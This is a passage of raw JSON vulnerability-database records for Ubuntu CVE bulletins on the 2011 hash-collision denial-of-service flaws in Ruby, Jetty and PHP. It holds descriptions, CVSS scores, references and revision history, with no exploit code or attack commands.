"objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zope-cmfplone"}], "bugs": []}, "lastseen": "2021-07-31T01:36:29", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4462"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-11-22T21:56:00", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-11-22T21:56:00", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "zope-cmfplone"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}, {"id": "UB:CVE-2011-4815", "vendorId": null, "hash": "d4ab9950abca849f9c2032bdac9d3350", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4815", "description": "Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting\nthe ability to trigger hash collisions predictably, which allows\ncontext-dependent attackers to cause a denial of service (CPU consumption)\nvia crafted input to an application that maintains a hash table.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | ruby 1.9+ randomizes hash\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4815", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4815", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/391606", "https://ubuntu.com/security/notices/USN-1377-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4815", "https://launchpad.net/bugs/cve/CVE-2011-4815", "https://security-tracker.debian.org/tracker/CVE-2011-4815"], "cvelist": ["CVE-2011-4815"], "immutableFields": [], "lastseen": "2021-11-22T21:55:59", "history": [{"bulletin": {"id": "UB:CVE-2011-4815", "vendorId": null, "hash": "59168e9ab5512d23c04efa14e08affd4", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4815", "description": "Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting\nthe ability to trigger hash collisions predictably, which allows\ncontext-dependent attackers to cause a denial of service (CPU consumption)\nvia crafted input to an application that maintains a hash table.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | ruby 1.9+ randomizes hash\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4815", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4815", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/391606", "https://ubuntu.com/security/notices/USN-1377-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4815", "https://launchpad.net/bugs/cve/CVE-2011-4815", "https://security-tracker.debian.org/tracker/CVE-2011-4815"], "cvelist": ["CVE-2011-4815"], "immutableFields": [], "lastseen": "2021-07-01T00:42:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4815"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "seebug", "idList": ["SSV:26121", "SSV:26126"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:VULN:12518", "SECURITYVULNS:DOC:27501"]}, {"type": "nessus", "idList": ["ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2011-17542.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:583CE20D04", "FEDORA:BFF2C21133"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120218", "OPENVAS:831554", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310881167", "OPENVAS:870638", "OPENVAS:863921", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:881167"]}, {"type": "debian", "idList": ["DEBIAN:DLA-88-1:4DC9E", "DEBIAN:DLA-263-1:BBAC7"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}, {"type": "gentoo", "idList": ["GLSA-201412-27"]}], "modified": "2021-07-01T00:42:54", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-01T00:42:54", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.8.7.357", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "ruby1.8"}], "bugs": []}, "lastseen": "2021-07-01T00:42:54", "differentElements": ["cvss2"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2011-4815", "vendorId": null, "hash": "f298e146b4c12893762fb370dbd28578", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4815", "description": "Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting\nthe ability to trigger hash collisions predictably, which allows\ncontext-dependent attackers to cause a denial of service (CPU consumption)\nvia crafted input to an application that maintains a hash table.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | ruby 1.9+ randomizes hash\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4815", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4815", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/391606", "https://ubuntu.com/security/notices/USN-1377-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4815", "https://launchpad.net/bugs/cve/CVE-2011-4815", "https://security-tracker.debian.org/tracker/CVE-2011-4815"], "cvelist": ["CVE-2011-4815"], "immutableFields": [], "lastseen": "2021-07-31T01:36:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4815"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:VULN:12518", "SECURITYVULNS:DOC:27500"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26121"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:583CE20D04", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881137", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:802794", "OPENVAS:870638", "OPENVAS:1361412562310870534", "OPENVAS:1361412562310881191", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310840923", "OPENVAS:1361412562310870638", "OPENVAS:881137", "OPENVAS:840923", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310864786", "OPENVAS:1361412562310121313", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310863681", "OPENVAS:864786", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:881191", "OPENVAS:863921", "OPENVAS:70754", "OPENVAS:870534"]}, {"type": "nessus", "idList": ["UBUNTU_USN-1377-1.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "SUSE_11_4_RUBY-120117.NASL", "ALA_ALAS-2012-35.NASL", "MACOSX_10_7_4.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "DEBIAN_DLA-88.NASL", "FEDORA_2011-17542.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MACOSX_SECUPD2012-002.NASL", "FEDORA_2011-17551.NASL", "6482.PRM", "REDHAT-RHSA-2012-0069.NASL", "SUSE_11_RUBY-187P357-120127.NASL", "GENTOO_GLSA-201412-27.NASL", "SUSE_11_RUBY-187P357-120126.NASL"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118"]}, {"type": "debian", "idList": ["DEBIAN:DLA-88-1:4DC9E", "DEBIAN:DLA-88-1:B6B6B", "DEBIAN:DLA-263-1:BBAC7"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}, {"type": "gentoo", "idList": ["GLSA-201412-27"]}], "modified": "2021-07-31T01:36:31", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-31T01:36:31", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.8.7.357", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "ruby1.8"}], "bugs": []}, "lastseen": "2021-07-31T01:36:31", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4815"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:VULN:12518", "SECURITYVULNS:DOC:27500"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133", "FEDORA:583CE20D04"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310831554", "OPENVAS:1361412562310881191", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310802794", "OPENVAS:881167", "OPENVAS:840923", "OPENVAS:802794", "OPENVAS:1361412562310881167", "OPENVAS:864786", "OPENVAS:1361412562310121313", "OPENVAS:863921", "OPENVAS:1361412562310863681", "OPENVAS:870534", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310870534", "OPENVAS:1361412562310864786", "OPENVAS:1361412562310881137", "OPENVAS:70754", "OPENVAS:863681", "OPENVAS:881137", "OPENVAS:831554", "OPENVAS:870638", "OPENVAS:1361412562310840923", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:881191", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120218"]}, {"type": "nessus", "idList": ["SOLARIS11_RUBY_20120417.NASL", "CENTOS_RHSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2011-17542.NASL", "SUSE_11_RUBY-187P357-120126.NASL", "CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SUSE_11_RUBY-187P357-120127.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "6482.PRM", "DEBIAN_DLA-88.NASL", "GENTOO_GLSA-201412-27.NASL", "REDHAT-RHSA-2012-0069.NASL", "SUSE_11_4_RUBY-120117.NASL", "MACOSX_10_7_4.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "MACOSX_SECUPD2012-002.NASL", "UBUNTU_USN-1377-1.NASL"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26121"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118"]}, {"type": "debian", "idList": ["DEBIAN:DLA-88-1:B6B6B", "DEBIAN:DLA-88-1:4DC9E", "DEBIAN:DLA-263-1:BBAC7"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}, {"type": "gentoo", "idList": ["GLSA-201412-27"]}], "modified": "2021-11-22T21:55:59", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-11-22T21:55:59", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.8.7.357", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "ruby1.8"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}, {"id": "UB:CVE-2011-4461", "vendorId": null, "hash": "2e0e688a64fcc6c952012e2815f0baaf", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4461", "description": "Jetty 8.1.0.RC2 and earlier computes hash values for form parameters\nwithout restricting the ability to trigger hash collisions predictably,\nwhich allows remote attackers to cause a denial of service (CPU\nconsumption) by sending many crafted parameters.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | in main in lucid, maverick, natty only\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://ubuntu.com/security/CVE-2011-4461", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4461", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://dev.eclipse.org/mhonarc/lists/jetty-users/msg01818.html", "https://ubuntu.com/security/notices/USN-1429-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4461", "https://launchpad.net/bugs/cve/CVE-2011-4461", "https://security-tracker.debian.org/tracker/CVE-2011-4461"], "cvelist": ["CVE-2011-4461"], "immutableFields": [], "lastseen": "2021-11-22T21:55:58", "history": [{"bulletin": {"id": "UB:CVE-2011-4461", "vendorId": null, "hash": "58e772431b14d2c7e8b30dcc77b7b353", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4461", "description": "Jetty 8.1.0.RC2 and earlier computes hash values for form parameters\nwithout restricting the ability to trigger hash collisions predictably,\nwhich allows remote attackers to cause a denial of service (CPU\nconsumption) by sending many crafted parameters.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | in main in lucid, maverick, natty only\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4461", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4461", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://dev.eclipse.org/mhonarc/lists/jetty-users/msg01818.html", "https://ubuntu.com/security/notices/USN-1429-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4461", "https://launchpad.net/bugs/cve/CVE-2011-4461", "https://security-tracker.debian.org/tracker/CVE-2011-4461"], "cvelist": ["CVE-2011-4461"], "immutableFields": [], "lastseen": "2021-07-01T00:42:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4461"]}, {"type": "openvas", "idList": ["OPENVAS:840993", "OPENVAS:864103", "OPENVAS:1361412562310864104", "OPENVAS:864104", "OPENVAS:1361412562310864103", "OPENVAS:1361412562310840993"]}, {"type": "redhat", "idList": ["RHSA-2012:1604", "RHSA-2012:1605", "RHSA-2012:1606"]}, {"type": "fedora", "idList": ["FEDORA:8FB3320923", "FEDORA:6555420CE1"]}, {"type": "nessus", "idList": ["ORACLE_ENTERPRISE_MANAGER_JAN_2015_CPU.NASL", "UBUNTU_USN-1429-1.NASL", "FEDORA_2012-0730.NASL", "OPENSUSE-2012-128.NASL", "FEDORA_2012-0752.NASL", "SUSE_11_4_JETTY5-120215.NASL"]}, {"type": "ubuntu", "idList": ["USN-1429-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14233", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3-2985753", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJAN2015-1972971", "ORACLE:CPUAPR2016V3", "ORACLE:CPUJUL2018", "ORACLE:CPUJAN2015"]}], "modified": "2021-07-01T00:42:52", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-07-01T00:42:52", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "jetty"}], "bugs": []}, "lastseen": "2021-07-01T00:42:52", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2011-4461", "vendorId": null, "hash": "bfbd5c336a9c09692513f3630e42bcc6", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4461", "description": "Jetty 8.1.0.RC2 and earlier computes hash values for form parameters\nwithout restricting the ability to trigger hash collisions predictably,\nwhich allows remote attackers to cause a denial of service (CPU\nconsumption) by sending many crafted parameters.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | in main in lucid, maverick, natty only\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://ubuntu.com/security/CVE-2011-4461", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4461", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "http://dev.eclipse.org/mhonarc/lists/jetty-users/msg01818.html", "https://ubuntu.com/security/notices/USN-1429-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4461", "https://launchpad.net/bugs/cve/CVE-2011-4461", "https://security-tracker.debian.org/tracker/CVE-2011-4461"], "cvelist": ["CVE-2011-4461"], "immutableFields": [], "lastseen": "2021-07-31T01:36:33", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4461"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310840993", "OPENVAS:840993", "OPENVAS:1361412562310864103", "OPENVAS:864104", "OPENVAS:1361412562310864104", "OPENVAS:864103"]}, {"type": "nessus", "idList": ["FEDORA_2012-0752.NASL", "UBUNTU_USN-1429-1.NASL", "SUSE_11_4_JETTY5-120215.NASL", "ORACLE_ENTERPRISE_MANAGER_JAN_2015_CPU.NASL", "FEDORA_2012-0730.NASL", "OPENSUSE-2012-128.NASL"]}, {"type": "ubuntu", "idList": ["USN-1429-1"]}, {"type": "fedora", "idList": ["FEDORA:6555420CE1", "FEDORA:8FB3320923"]}, {"type": "redhat", "idList": ["RHSA-2012:1604", "RHSA-2012:1605", "RHSA-2012:1606"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:VULN:14233"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2018", "ORACLE:CPUAPR2016V3-2985753", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUAPR2016V3", "ORACLE:CPUJAN2015-1972971", "ORACLE:CPUJAN2015"]}], "modified": "2021-07-31T01:36:33", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-07-31T01:36:33", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "jetty"}], "bugs": []}, "lastseen": "2021-07-31T01:36:33", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4461"]}, {"type": "fedora", "idList": ["FEDORA:6555420CE1", "FEDORA:8FB3320923"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310840993", "OPENVAS:840993", "OPENVAS:1361412562310864103", "OPENVAS:864104", "OPENVAS:1361412562310864104", "OPENVAS:864103"]}, {"type": "nessus", "idList": ["FEDORA_2012-0730.NASL", "OPENSUSE-2012-128.NASL", "ORACLE_ENTERPRISE_MANAGER_JAN_2015_CPU.NASL", "UBUNTU_USN-1429-1.NASL", "FEDORA_2012-0752.NASL", "SUSE_11_4_JETTY5-120215.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:1604", "RHSA-2012:1605", "RHSA-2012:1606"]}, {"type": "ubuntu", "idList": ["USN-1429-1"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14233", "SECURITYVULNS:DOC:27500"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2016V3-2985753", "ORACLE:CPUJAN2015", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJAN2015-1972971"]}], "modified": "2021-11-22T21:55:58", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-11-22T21:55:58", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "jetty"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}, {"id": "UB:CVE-2011-4885", "vendorId": null, "hash": "61a81f83f170597f6d5f94e862abc522", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4885", "description": "PHP before 5.3.9 computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296>\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4885", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "https://ubuntu.com/security/notices/USN-1358-1", 